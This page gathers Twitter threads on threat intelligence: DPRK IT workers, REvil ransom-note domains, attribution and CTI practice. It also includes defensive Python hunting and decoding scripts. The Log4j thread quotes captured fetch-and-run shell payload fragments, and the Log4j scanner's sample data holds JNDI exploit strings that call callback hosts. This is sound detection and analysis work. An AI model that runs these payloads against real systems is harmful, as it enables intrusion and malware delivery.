Discover and read the best of Twitter Threads about #ThreatIntel

Most recent (24)

#ICYMI, here's a #threatintel related🧵👇 by me on @USTreasury advisory on DPRK IT workers' attempts to obtain employment while posing as non-North Korean nationals:… (1/?)
DPRK IT workers "engage in a wide range of IT dev work, such as: mobile & web-based apps, virtual currency exchange platforms & digital coins. Some designed virtual currency exchanges or created analytic tools/apps for virtual currency traders & marketed their products." (2/?)
This reminds me, for example, of Marine Chain Token: (…;…), #AppleJeus (…) and, more recently, #TraderTraitor (…). #HIDDENCOBRA/#APT38 loves loves loves their crypto (3/?)
Read 14 tweets
Visualizing #cybersecurity concepts can be a great way to learn more about specific tools, methodologies, and techniques! Here is a thread that shows 6 useful infographics on threat intelligence and related topics!🧵👇#infosec #threatintel

1⃣ - Practical Threat Intel
2⃣ - Tactics, Techniques and Procedures is an important concept to understand when you are working on threat intelligence to understand the capabilities of threat actors! 🤓 #Infosec #ttp
3⃣ - MITRE ATT&CK Matrix has become one of the references to classify and categorize attackers' TTPs! ☠️ #cybersecurity
Read 8 tweets
Many #threatintel teams likely have a new requirement to provide daily (or more!) updates on the UA/RU war to include cyber threat activity AND factors like sanctions, military developments, etc. This is not easy. Here are my ✅ tips for surviving "intel update fatigue" 🧵.
✅ Reduce, filter sources

There is too much information--much of it unconfirmed--from disparate sources. Stick to news from reliable and official sources (national CERTs, your intel providers, AP, Reuters, BBC, etc.) who have done the vetting for you.
✅ Change your dissemination habits; prioritize speed

If your team typically disseminates information via traditional reports (presumably over email), consider creating a dedicated chat channel with your security and business partners exclusively for fast updates...
Read 9 tweets
My parents have been looking to buy an RV and this evening my Mom found an oddly cheap RV on an "RV Trader" website. I'm pretty sure it's a scam - come with me while I investigate and use some #OSINT along the way! #ThreatIntel #SCAM #infosec
The link my mom sent was for a 2005 Airstream Bambi, for 9,800 dollars - wait, that seems way too cheap!
First red flag, the website doesn't seem to give you any need to click "request more info" which prompts for your contact information.
Read 12 tweets
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (…).

Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel
Example CVE-2021-44228 payload:

(curl -s||wget -q -O-|bash

Source IP: (🇷🇺)
Example CVE-2021-44228 payload (decoded):
wget;chmod +x lh[.]sh;./

DDoS malware (…)

Source IP: (🇧🇩/🇳🇱)
Read 41 tweets
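As an added example (not part of the thread above, and not the API it mentions): a small Python scanner that looks for CVE-2021-44228 JNDI lookup strings in web-server access logs. It undoes percent-encoding and the `${lower:}`, `${upper:}` and `${x:-y}` lookup forms that scanners used to split up the literal `${jndi:`, then pulls the lookup scheme, the callback host and the source IP as IOCs. The log lines, IP addresses and field layout (Combined Log Format) are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Combined Log Format lines for the demonstration; they are not the
# thread's captures. 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:01:02 +0000] "GET /?x=${jndi:ldap://203.0.113.9:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.6 - - [10/Dec/2021:14:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9:1389/b}"
203.0.113.7 - - [10/Dec/2021:14:01:04 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.8 - - [10/Dec/2021:14:01:05 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/d} HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Dec/2021:14:01:06 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)
# Log4j lookup forms used to break up the literal "jndi": case mapping and default values
CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")        # ${::-j}, ${env:NOPE:-j}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(.*?)\}", re.I)


def url_decode_fully(s, max_rounds=5):
    """Undo repeated percent-encoding; scanners double-encode to slip past WAF rules."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize_lookups(s, max_rounds=20):
    """Resolve nested case-mapping and default-value lookups from the inside out."""
    for _ in range(max_rounds):
        new = CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s
        )
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def extract_jndi(value):
    """Return every JNDI lookup hidden in one logged field, with scheme and callback host."""
    hits = []
    for m in JNDI_RE.finditer(normalize_lookups(url_decode_fully(value))):
        scheme, target = m.group(1).lower(), m.group(2).strip()
        host = re.match(r"//([^/:]+)", target)
        hits.append({"scheme": scheme, "target": target, "callback": host.group(1) if host else None})
    return hits


def scan_log(text):
    """Scan every logged string field (applications log headers too, not only the URI)."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "user_agent"):
            for hit in extract_jndi(m.group(field)):
                findings.append({"src": m.group("src"), "field": field, **hit})
    return findings


def callback_hosts(findings):
    """The second-stage hosts to block or pivot on."""
    return sorted({f["callback"] for f in findings if f["callback"]})


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']:<14} {f['field']:<10} {f['scheme']:<5} -> {f['callback']}")
```

The normalizer covers the obfuscations seen most often in scanning traffic, not every Log4j lookup (`${sys:}`, `${date:}` and friends can be abused the same way), and the string often arrives in request headers the web server never writes to its access log, so treat this as a triage aid over what you do have rather than a complete detection.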
Today I started compiling a list of the #twitter accounts of companies that develop useful #OSINT tools.…

In this thread🧵, I'll talk about the project behind each account on this list.
@haveibeenpwned Check if your email or phone is in a data breach

@duckduckgo Privacy search engine

@webintmaster Companies research tool…
@Fear_the_Foca tool used to find metadata and hidden information in documents

@SpyseHQ internet access search engine

@sploitus_com tools & exploits search engine
Read 28 tweets
In light of the recent #SupplyChain attack on @KaseyaCorp by #REvil, it is worth paying attention to decoder[.]re included within the ransom notes, used additionally to 'mirror' in TOR network. #Ransomware #Cybersecurity #ThreatIntel #ThreatHunting #Malware
Similar to decryptor[.]cc and decryptor[.]top in previous #REvil/#Sodinokibi versions, decoder[.]re is used to grant the victims access to the threat actors' website for further negotiations should their connection be limited via #TOR.
To access the page in WWW or TOR - the victim needs to provide a valid UID (e.g. "9343467A488841AC")
Read 11 tweets
ICYMI, @PwC_UK's 2020 #threatintel Year in Retrospect report is out now! All the team contributed but h/t to @KystleM_Reid! 🔥 You can check it out here: In this thread, I will summarise some of what I thought were key findings: 🧵👇 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.🙏 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
Read 19 tweets
I'm generally a pretty positive person, but it's Festivus, so let's blow off some steam and air our #threatintel grievances. Threat intel feeds are just data feeds, they're not threat intel. Please stop naming groups after malware, it's confusing AF.
Nation states are not countries. CC @cnoanalysis…
If you use fear, uncertainty, and doubt to sell things, you are a GRINCH and please stop.
Read 19 tweets
A thread on bad analysis. When #ThreatIntel analysts want to show off their Foreign Policy and Economist subscription status after reading the Russian foreign policy Wikipedia page /n #threatintelligence #cybersecurity #infosec
Most analysts who are "doing attribution" aren't doing good cyber threat intelligence, they're doing poor foreign policy analysis
They have neither the data nor the expertise to make even a moderately confident statement on attribution
Read 12 tweets
My paper on “Public Attribution of Cyber Intrusions” was published in the Journal of Cybersecurity (@OUPAcademic). It's open access so everyone can have a read. I summarize the main insights in the thread below:…
Drawing on the intelligence studies literature, I argue that public attribution is employed to shape the “rules of the game” and thereby shape the normative and operational environment for cyber operations.
I split attribution into sense-making and meaning-making processes: sense-making process refers to the knowledge-generation process that establishes what happened, the meaning-making process to deliberate actions that influence how others interpret a particular cyber intrusion
Read 13 tweets
Sunday's fun fact on inferences:
Arthur Conan Doyle's fictional character "Sherlock Holmes" is based on his real-life professor under whom he studied medicine, Dr. Joseph Bell.

"It is most certainly to you that I owe Sherlock Holmes and though in the stories I have the advantage of being able to place Sherlock in all sorts of dramatic positions, I do not think his analytical work is in the least exaggeration of some effects which I have seen you produce in the outpatient ward," wrote Conan Doyle in a letter to Dr. Bell.
Apparently, other than his medical education, Dr. Bell was also very knowledgeable in other areas such as geography and the cultures, the dialects, patterns of speech and behavior, the army, and more. He was also very observant.
Read 11 tweets
False flag operations are very rare because they're risky and the blowback effects are bad. Interestingly, the risks increase the more "important" you are so the most powerful countries are less likely to conduct FF ops. /1 #infosec #cybersecurity #ThreatIntel
Traditional covert and clandestine operations are cheaper, less risky, and more likely to succeed than false flag ops. Importantly, not all attempts to redirect blame are false flags; most are just considered standard covert ops. /2
False flags are also generally misunderstood and confused. For example, using Russian as an English speaker in malware is, by itself, not a false flag but rather just considered good covert practice. It doesn't attempt to place blame but just conceal the operators better. /3
Read 5 tweets
A common ask: why don't you update the Diamond Model paper with newer examples? No. I like to teach the earlier papers to imbue history into infosec. We're surrounded by the new and the "today" - I want to give space to what came before. #infosec #cybersecurity #ThreatIntel
It's important in #infosec to be a student of history because you will be able to scale. There may be 1.5M new threats today, but they're just variations on 3 threats from a decade ago. You can now solve the better #cybersecurity problems.
So, in my courses I don't teach the new to make it "relevant." I teach the old to expose students who likely have never read them and provide additional insight they would have lacked with only the "newest."
Read 3 tweets
Significant threat actors, their recent histories, and any noteworthy changes in 2019 are chronicled here by @PwC_UK #threatintel @smoothimpact @pewpew_lazors @cyberoverdrive #CyberSecurity…
From the report, the targets of #cybercrime and the preponderance of financial motivations #ThreatIntel
@PwC #threatintel team issued 221 reports covering these sectors and threat actor locations in 2019
Read 4 tweets
Key points from my “Lessons from the world's leading cyber threat intelligence (CTI) programs” talk at @gcfriyadh in Riyadh. Video will be shared soon. Talking points aren’t ideal for Twitter but I’ll give it a go [1/24] #ThreatIntel #CyberThreats
@gcfriyadh A CTI program is all about reducing risk for an org. Risk = probability x impact. CTI is about understanding the internal and external factors that impact probability + impact of risks so decisions can be made that reduce risk [2/24]
@gcfriyadh CTI by definition is threat focused. A threat is a person/group with a motivation, intent and a way of working (TTPs). Malware isn’t a threat, the person using it is. Therefore a CTI program tracks threats being people/groups over time [3/24]
Read 24 tweets
🆕 Microsoft.Workflow.Compiler sample with low VT detection!
1⃣C:\ProgramData\ccm_deploy.xml 🧐
MD5 fb98cddfa2e13334989d27d1b5b7cdda
VT (0/56):…
2⃣Loads C:\ProgramData\package.xml
MD5 a916ca1d57d9c3b2627907ab68a264fe
VT (1/58):…
[1/4]
I uploaded both to @virusbay_io:…

and the extracted payload to @anyrun_app:…

Injection Target Process = %ProgramFiles%\Internet Explorer\iexplore.exe
PPID Spoof Parent = True
PPID Spoof Process = explorer
Returned true
[2/4]
@virusbay_io @anyrun_app More info on @mattifestation's method:
1⃣ My favorite implementation uploaded publicly is this Excel file (probably authored by @egyed_laszlo):
2⃣ The first workflow VT sample uploaded was ~1 year ago:

^plus background & links
Read 12 tweets
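As an added example (not from the thread, and not the sample's or @mattifestation's code): a Python hunt over process-creation telemetry for the Microsoft.Workflow.Compiler.exe technique the thread describes, where the signed .NET binary is handed an XML file naming the source to compile and run. The event records are constructed and use Sysmon-style field names (Image, CommandLine, ParentImage, OriginalFileName), which is an assumption about your log source; the ProgramData XML path is the one named in the thread, the remaining paths are made up. Because the injected iexplore.exe is started with a spoofed explorer.exe parent, a parent-child rule on iexplore.exe sees nothing unusual, so the hunt anchors on the compiler execution itself, where its input XML lives, and the PE's OriginalFileName so a renamed copy still matches.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (Event ID 1); not the thread's
# telemetry. Field names follow Sysmon's schema, an assumption about your log source.
WFC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
EVENTS = [
    {   # the pattern from the thread: the compiler fed an XML dropped in ProgramData
        "Image": WFC, "OriginalFileName": "Microsoft.Workflow.Compiler.exe",
        "CommandLine": f'"{WFC}" C:\\ProgramData\\ccm_deploy.xml C:\\ProgramData\\result.xml',
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # the injection target with its spoofed explorer.exe parent: looks normal
        "Image": r"C:\Program Files\Internet Explorer\iexplore.exe", "OriginalFileName": "IEXPLORE.EXE",
        "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # a renamed copy of the compiler (made up), caught only via OriginalFileName
        "Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "Microsoft.Workflow.Compiler.exe",
        "CommandLine": r"C:\Users\Public\svchost.exe C:\Users\Public\in.xml C:\Users\Public\out.xml",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # a developer build from a source tree, launched by Visual Studio (made up)
        "Image": WFC, "OriginalFileName": "Microsoft.Workflow.Compiler.exe",
        "CommandLine": f'"{WFC}" C:\\src\\wf\\obj\\input.xml C:\\src\\wf\\obj\\output.xml',
        "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2019\Professional\Common7\IDE\devenv.exe",
    },
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

WFC_NAME = "microsoft.workflow.compiler.exe"
# user-writable locations where a dropper would stage its XML (heuristic, not exhaustive)
STAGING_DIRS = ("\\programdata\\", "\\users\\public\\", "\\appdata\\", "\\temp\\", "\\downloads\\")
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                  "rundll32.exe", "winword.exe", "excel.exe", "outlook.exe"}


def split_cmdline(cmdline):
    """Tokenize a Windows command line into quoted runs or whitespace-separated words."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def basename(path):
    return PureWindowsPath(path).name.lower()


def is_workflow_compiler(ev):
    """Match on the on-disk name or the PE's OriginalFileName, so renaming does not help."""
    return basename(ev.get("Image", "")) == WFC_NAME or ev.get("OriginalFileName", "").lower() == WFC_NAME


def hunt_workflow_compiler(events):
    findings = []
    for ev in events:
        if not is_workflow_compiler(ev):
            continue
        args = split_cmdline(ev.get("CommandLine", ""))[1:]   # <input.xml> <output.xml>
        input_xml = args[0] if args else None
        output_xml = args[1] if len(args) > 1 else None
        reasons = []
        if input_xml and any(d in input_xml.lower() for d in STAGING_DIRS):
            reasons.append("input XML in user-writable staging directory")
        if basename(ev.get("ParentImage", "")) in SCRIPT_PARENTS:
            reasons.append("spawned by shell, script host or Office")
        if basename(ev.get("Image", "")) != WFC_NAME:
            reasons.append("binary renamed on disk")
        findings.append({
            "image": ev.get("Image"), "parent": ev.get("ParentImage"),
            "input_xml": input_xml, "output_xml": output_xml,
            "severity": "high" if reasons else "medium",   # every execution is worth a look
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in hunt_workflow_compiler(EVENTS):
        print(f"[{f['severity']}] {f['image']}  input={f['input_xml']}  {'; '.join(f['reasons'])}")
```

The input XML path is the artefact to collect: it is what the sample left on disk and what the next stage was compiled from, so hand it to the IR team alongside the event rather than only alerting on the process.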
🆕 🔥 Research on PDB Paths from @stvemillertime:…
#DFIR primer & exploration of these wonderful artifacts.
Followed by a survey of malware PDB conventions, PDB anomalies, attacker mistakes. All with attribution, including Western gov.

THREAD (1/n)
Includes considerations for #threatintel shops, red teams/operators, and weaknesses in PDB paths.

Blog also has: the most malware code families and threat groups we've ever published, some spicy groups, and some light swearing (malware devs are potty mouths) #SwearEngine

2/n
I love that @stvemillertime surfaced a bunch of strange PDB path anomalies and dug in with @mikesiko's #FLARE team to get to ground truth & replicate the artifact.…
Where my #DFIR followers at?
❓ Curious if you've found other anomalies not listed?
3/n
Read 5 tweets
Someone's trying to backdoor "hexcalc.exe" from GitHub and not doing a great job. Here's a quick exploration of the VT tester's 6 files, the corresponding PDB anomalies, PS1 & Cobalt Strike shellcode, and Yara #hunting rules.

Thread 1/n
The first file tested by the VT account is hexcalc.exe
PDB: D:\codes\WinHexCalc\Release\hexcalc.pdb

This led me to search for the original (shady) project from Github:…
and this indeed contains this initial hexcalc.exe

They attempt to backdoor the file 4 different times with PS1 shellcode, uploading all to VT:
PDB: F:\Devel\WinHexCalc-master\Release\hexcalc.pdb
Read 9 tweets
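As an added example (not the tooling of either thread above, nor FLARE's): a Python parser that pulls CodeView RSDS records (GUID, age, PDB path) out of raw bytes, derives the fields a hunter wants from the path (directory, an inferred project root, the username from a C:\Users\ prefix, the symbol-server lookup key), flags the kinds of anomaly the PDB-path research thread and the hexcalc.exe thread discuss, and emits a YARA rule keyed on the project root for hunting related builds. The sample blob is constructed, not a real PE; it reuses the two WinHexCalc PDB paths quoted in the hexcalc thread and adds two made-up records. In a real PE the record is reached through the IMAGE_DEBUG_DIRECTORY entry of type CODEVIEW, but scanning for the RSDS signature also works on memory dumps and carved fragments, so it is shown that way.

```python
import re
import struct
import uuid


def _rsds(guid_bytes, age, path):
    """Build one CodeView 'RSDS' record: signature, 16-byte GUID, 4-byte age, NUL-terminated path."""
    return b"RSDS" + guid_bytes + struct.pack("<I", age) + path.encode("utf-8") + b"\x00"


# Constructed blob standing in for a PE's debug data; not a real binary. The two
# WinHexCalc paths are the ones quoted in the thread, the other two are made up.
SAMPLE_BLOB = (
    b"\x90" * 16
    + _rsds(bytes(range(16)), 1, r"D:\codes\WinHexCalc\Release\hexcalc.pdb")
    + b"\x00" * 7
    + _rsds(bytes(range(16, 32)), 2, r"F:\Devel\WinHexCalc-master\Release\hexcalc.pdb")
    + b"\xcc" * 4
    + _rsds(bytes(range(32, 48)), 1, r"C:\Users\dev\source\repos\loader\x64\Release\loader.pdb")
    + _rsds(bytes(range(48, 64)), 9, r"Z:\build\stager.dll")
)

USER_DIR_RE = re.compile(r"^[a-z]:\\users\\([^\\]+)\\", re.I)
BUILD_DIRS = {"release", "debug", "x64", "x86", "bin", "obj"}


def project_root(directory):
    """Trim build-configuration folders so related builds share one hunting prefix."""
    parts = directory.split("\\")
    for i, p in enumerate(parts):
        if p.lower() in BUILD_DIRS:
            parts = parts[:i]
            break
    return "\\".join(parts)


def parse_rsds(blob, max_path=1024):
    """Find every RSDS record in raw bytes (file, dump or memory) and derive hunting fields."""
    records = []
    off = blob.find(b"RSDS")
    while off != -1 and off + 24 <= len(blob):
        guid_le, age = struct.unpack_from("<16sI", blob, off + 4)
        end = blob.find(b"\x00", off + 24, off + 24 + max_path)
        stop = end if end != -1 else off + 24 + max_path
        path = blob[off + 24:stop].decode("utf-8", "replace")
        guid = uuid.UUID(bytes_le=guid_le)           # first three fields are little-endian on disk
        directory, _, filename = path.rpartition("\\")
        user = USER_DIR_RE.match(path)
        anomalies = []
        if not path.lower().endswith(".pdb"):
            anomalies.append("extension is not .pdb")
        if not re.match(r"^[A-Za-z]:\\", path):
            anomalies.append("no drive-letter prefix")
        if any(ord(c) > 127 for c in path):
            anomalies.append("non-ASCII characters")
        if end == -1:
            anomalies.append("unterminated path")
        records.append({
            "offset": off, "guid": str(guid), "age": age, "path": path,
            "directory": directory, "filename": filename, "project_root": project_root(directory),
            "username": user.group(1) if user else None,
            "symbol_key": guid.hex.upper() + format(age, "X"),   # <GUID><age>, the symbol-server key
            "anomalies": anomalies,
        })
        off = blob.find(b"RSDS", end + 1 if end != -1 else off + 4)
    return records


def yara_rule(record, name=None):
    """Emit a YARA rule keyed on the project root (ascii and UTF-16) for hunting related builds."""
    name = name or "pdb_" + re.sub(r"[^A-Za-z0-9]", "_", record["filename"].rsplit(".", 1)[0])
    needle = (record["project_root"] + "\\").replace("\\", "\\\\")   # YARA escapes backslashes
    return (
        f"rule {name} {{\n"
        f"  strings:\n"
        f'    $pdb = "{needle}" ascii wide nocase\n'
        f"  condition:\n"
        f"    uint16(0) == 0x5A4D and $pdb\n"
        f"}}\n"
    )


if __name__ == "__main__":
    for r in parse_rsds(SAMPLE_BLOB):
        print(f"{r['symbol_key']}  {r['path']}  user={r['username']}  {r['anomalies']}")
    print(yara_rule(parse_rsds(SAMPLE_BLOB)[0]))
```

More than one RSDS record in a single file is itself worth a look (an embedded or appended PE, or a tool that rewrote the debug directory), which is why the parser returns all of them with their offsets instead of stopping at the first.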
Only about two months later than I originally planned, but here we go. I'll summarise areas we are hiring into in the thread 👇, along with a steer on experience and location where possible (all UK, but happy to make introductions elsewhere).
We have space for a mix of junior and experienced folks in most roles, and there is also a mix of location and partial remote working options depending on the role, so please DM to ask clarification questions or to ask about applying :) A little background on the team:
Cyber Threat Operations is PwC's front-line technical security services group, responsible for a portfolio of blue & red team services to global clients. Blue includes subscription & bespoke #threatintel & research services, short-term & managed endpoint/network threat hunting,
Read 18 tweets
#threatintel thread! The other week, I rendered a high confidence assessment related to malicious activity that I judged was targeting my organization's customers with intent to gain access to our proprietary content. Turns out I was TOTALLY WRONG (1/x)
The activity I THOUGHT was malicious was actually benign and completely expected. Reflecting on the analysis, I realized I fell victim to CONFIRMATION BIAS and FAULTY ASSUMPTIONS. I thought I was immune to these #threatintel phenomena, but I'm not (2/x)
First, I didn't fully understand what I was looking at: what normal customer-to-org interactions look like (authentication). This led to FAULTY ASSUMPTIONS about the nature of the activity I was examining. Boy did it look phishy! There was no way it was legitimate! (3/x)
Read 14 tweets
Although #FIN10 achieved some success targeting the 🇨🇦 casino and mining industry, @FireEye hasn't discussed the actor much since the June 2017 blog article…, because, well… the techniques are a bit abecedarian. (h/t
FIN10 has gone from targeting those industries, stealing PII and extorting victims for BTC, to posting particularly lame, decimal encoded phishing lures to Canadian stock market forums, directing victims to EMPIRE downloads. Decimal encoded URLs are a consistent FIN10 TTP.
To lend some legitimacy to the phishing lures, FIN10 registers masquerade domains and establishes websites using scraped source code from legitimate domains. #trashtics
Read 9 tweets
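As an added example (not FireEye's or the thread's code): a Python decoder for the decimal-encoded lure trick, handling three common forms of it, a `String.fromCharCode(104,116,...)` array in a script tag, HTML numeric entities (`&#104;&#116;...`), and a bare space-separated run of decimal codes in a forum post. The lure fragment is constructed, with URLs under the reserved documentation domain example.com, and it is not one of FIN10's posts.

```python
import re
from html import unescape

# Constructed lure fragment; not FIN10's actual posts. The URLs use the reserved
# documentation domain example.com.
SAMPLE_LURE = """\
<p>Big news on $ACME, read the report:</p>
<script>document.write(String.fromCharCode(104,116,116,112,58,47,47,114,101,112,111,114,116,46,101,120,97,109,112,108,101,46,99,111,109,47,113,51,46,112,100,102));</script>
<p>&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#102;&#105;&#108;&#101;&#115;&#46;&#101;&#120;&#97;&#109;&#112;&#108;&#101;&#46;&#99;&#111;&#109;&#47;&#117;&#112;&#100;&#97;&#116;&#101;</p>
<p>Forum mirror: 104 116 116 112 115 58 47 47 109 105 114 114 111 114 46 101 120 97 109 112 108 101 46 99 111 109 47 100 108</p>
"""

# a run of at least eight 1-3 digit numbers separated by commas and/or whitespace
NUM_RUN_RE = re.compile(r"\b\d{1,3}(?:\s*,\s*\d{1,3}|\s+\d{1,3}){7,}\b")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'<>)]*)?")


def decode_decimal_runs(text):
    """Turn decimal char-code runs into text when every value is a printable ASCII code."""
    def repl(m):
        codes = [int(n) for n in re.split(r"[\s,]+", m.group(0).strip())]
        if all(32 <= c < 127 for c in codes):
            return "".join(chr(c) for c in codes)
        return m.group(0)                      # a genuine list of numbers, leave it alone
    return NUM_RUN_RE.sub(repl, text)


def deobfuscate(text):
    """Peel the two layers lures mix: HTML numeric entities, then decimal char-code arrays."""
    return decode_decimal_runs(unescape(text))


def extract_urls(text):
    """Unique URLs visible once the encoding is stripped; these are the indicators to pivot on."""
    return sorted(set(URL_RE.findall(deobfuscate(text))))


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_LURE):
        print(url)
```

The printable-ASCII check is what keeps the decoder from mangling ordinary number lists in the same post (prices, share counts, a date), so run it over the whole page rather than only the script blocks.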
I’m a proponent of writing things down. As #threatintel analysts, a big part of our job is recognizing patterns and making connections. But sometimes, we don’t see the connections. Our brains can’t recall as much information as we think they can (1/x).
This is why it’s imperative to document and memorialize your knowledge. Use your IOC database, your commercial TIP, OneNote, Excel, Wiki, IR ticketing system, whatever you have to capture artifacts, IOC, notes (2/x).
Tag your data (hopefully you have a consistent tagging scheme); organize it; capture enrichment data and attributes that may allow for future correlation. Does this take extra time? Is it annoying sometimes in the face of an active campaign or IR operations? You bet (3/x).
Read 9 tweets
OVERRULED: Here's our take on outmaneuvering a potentially destructive adversary…
We talk compromise, RULER, and links to APT33.
Infosec Twitter suggests they dropped #SHAMOON 💥

Shout-out to co-authors: @QW5kcmV3 @_gackerman_ @a_tweeter_user @WylieNewmark
If you liked this part about our threat similarity engine; I have a confession: that is CYBER #machinelearning!

Designed by @BarryV & Nalani F.
Studied & prototyped by our data scientist @secbern.

Learn more here 📺: (it's not officially called APTinder)
If you like Operational Timelines, #AdversaryPursuit has you covered. We're including them in blogs because it's how we operate & it improves #threatintel sharing. Thx @QW5kcmV3

🖼️ #1: Suspected #APT33 ⏲️…
🖼️ #2: Suspected #APT29 ⏲️…
Read 4 tweets